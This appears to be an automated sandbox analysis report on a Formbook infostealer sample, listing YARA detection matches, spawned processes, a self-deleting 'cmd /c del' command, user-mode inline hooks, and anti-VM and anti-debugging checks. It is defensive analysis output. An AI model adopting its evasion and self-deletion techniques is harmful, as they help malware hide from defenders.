          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@4/4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404356
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_01
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile created: C:\Users\user\AppData\Local\Temp\nsaD9FC.tmpJump to behavior
          Source: SX365783909782021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SX365783909782021.exeVirustotal: Detection: 31%
          Source: SX365783909782021.exeReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile read: C:\Users\user\Desktop\SX365783909782021.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'Jump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: SX365783909782021.exe, 00000000.00000003.209611066.0000000009B30000.00000004.00000001.sdmp, SX365783909782021.exe, 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, help.exe, 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SX365783909782021.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeUnpacked PE file: 2.2.SX365783909782021.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_73762F60 push eax; ret 0_2_73762F8E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D0D2 push eax; ret 2_2_0041D0D8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D0DB push eax; ret 2_2_0041D142
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D085 push eax; ret 2_2_0041D0D8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419916 push ecx; iretd 2_2_0041991B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041692C push cs; ret 2_2_00416937
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D13C push eax; ret 2_2_0041D142
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00416B53 push edi; iretd 2_2_00416B54
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041AB2B pushad ; ret 2_2_0041AB2C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C1D0D1 push ecx; ret 2_2_00C1D0E4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D0D2 push eax; ret 2_1_0041D0D8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D0DB push eax; ret 2_1_0041D142
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D085 push eax; ret 2_1_0041D0D8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419916 push ecx; iretd 2_1_0041991B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041692C push cs; ret 2_1_00416937
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D13C push eax; ret 2_1_0041D142
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00416B53 push edi; iretd 2_1_00416B54
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041AB2B pushad ; ret 2_1_0041AB2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0367D0D1 push ecx; ret 5_2_0367D0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321AB2B pushad ; ret 5_2_0321AB2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03216B53 push edi; iretd 5_2_03216B54
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321692C push cs; ret 5_2_03216937
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D13C push eax; ret 5_2_0321D142
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219916 push ecx; iretd 5_2_0321991B
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D085 push eax; ret 5_2_0321D0D8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D0D2 push eax; ret 5_2_0321D0D8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D0DB push eax; ret 5_2_0321D142
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile created: C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xED
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SX365783909782021.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000032098E4 second address: 00000000032098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000003209B5E second address: 0000000003209B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409A90 rdtsc 2_2_00409A90
          Source: C:\Windows\explorer.exe TID: 4660Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4660Thread sleep time: -62000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 4740Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.226481174.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.219682081.0000000004E61000.00000004.00000001.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-s
          Source: explorer.exe, 00000003.00000000.247140572.0000000004E61000.00000004.00000001.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-
          Source: explorer.exe, 00000003.00000000.247457581.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.226715278.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.221477185.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAJ
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409A90 rdtsc 2_2_00409A90
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0040ACD0 LdrLoadDll,2_2_0040ACD0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFF0BF mov ecx, dword ptr fs:[00000030h]2_2_00BFF0BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFF0BF mov eax, dword ptr fs:[00000030h]2_2_00BFF0BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFF0BF mov eax, dword ptr fs:[00000030h]2_2_00BFF0BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C5B8D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00C5B8D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C5B8D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C5B8D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C5B8D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C5B8D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]2_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]2_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]2_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]2_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]2_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]2_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9080 mov eax, dword ptr fs:[00000030h]2_2_00BC9080
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C43884 mov eax, dword ptr fs:[00000030h]2_2_00C43884
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C43884 mov eax, dword ptr fs:[00000030h]2_2_00C43884
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC58EC mov eax, dword ptr fs:[00000030h]2_2_00BC58EC
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB8E4 mov eax, dword ptr fs:[00000030h]2_2_00BEB8E4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB8E4 mov eax, dword ptr fs:[00000030h]2_2_00BEB8E4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]2_2_00BC40E1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]2_2_00BC40E1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]2_2_00BC40E1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C090AF mov eax, dword ptr fs:[00000030h]2_2_00C090AF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]2_2_00BEA830
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]2_2_00BEA830
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]2_2_00BEA830
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]2_2_00BEA830
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]2_2_00BF002D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]2_2_00BF002D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]2_2_00BF002D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]2_2_00BF002D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]2_2_00BF002D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]2_2_00BDB02A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]2_2_00BDB02A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]2_2_00BDB02A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]2_2_00BDB02A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82073 mov eax, dword ptr fs:[00000030h]2_2_00C82073
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C91074 mov eax, dword ptr fs:[00000030h]2_2_00C91074
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]2_2_00C47016
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]2_2_00C47016
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]2_2_00C47016
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C94015 mov eax, dword ptr fs:[00000030h]2_2_00C94015
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C94015 mov eax, dword ptr fs:[00000030h]2_2_00C94015
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE0050 mov eax, dword ptr fs:[00000030h]2_2_00BE0050
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE0050 mov eax, dword ptr fs:[00000030h]2_2_00BE0050
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF61A0 mov eax, dword ptr fs:[00000030h]2_2_00BF61A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF61A0 mov eax, dword ptr fs:[00000030h]2_2_00BF61A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C541E8 mov eax, dword ptr fs:[00000030h]2_2_00C541E8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2990 mov eax, dword ptr fs:[00000030h]2_2_00BF2990
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA185 mov eax, dword ptr fs:[00000030h]2_2_00BFA185
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEC182 mov eax, dword ptr fs:[00000030h]2_2_00BEC182
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]2_2_00BCB1E1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]2_2_00BCB1E1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]2_2_00BCB1E1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C469A6 mov eax, dword ptr fs:[00000030h]2_2_00C469A6
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]2_2_00C849A4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]2_2_00C849A4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]2_2_00C849A4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]2_2_00C849A4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]2_2_00C451BE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]2_2_00C451BE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]2_2_00C451BE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]2_2_00C451BE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF513A mov eax, dword ptr fs:[00000030h]2_2_00BF513A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF513A mov eax, dword ptr fs:[00000030h]2_2_00BF513A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]2_2_00BE4120
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]2_2_00BE4120
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]2_2_00BE4120
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]2_2_00BE4120
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov ecx, dword ptr fs:[00000030h]2_2_00BE4120
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]2_2_00BC9100
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]2_2_00BC9100
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]2_2_00BC9100
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB171 mov eax, dword ptr fs:[00000030h]2_2_00BCB171
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB171 mov eax, dword ptr fs:[00000030h]2_2_00BCB171
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC962 mov eax, dword ptr fs:[00000030h]2_2_00BCC962
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB944 mov eax, dword ptr fs:[00000030h]2_2_00BEB944
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB944 mov eax, dword ptr fs:[00000030h]2_2_00BEB944
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDAAB0 mov eax, dword ptr fs:[00000030h]2_2_00BDAAB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDAAB0 mov eax, dword ptr fs:[00000030h]2_2_00BDAAB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFFAB0 mov eax, dword ptr fs:[00000030h]2_2_00BFFAB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]2_2_00BC52A5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]2_2_00BC52A5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]2_2_00BC52A5
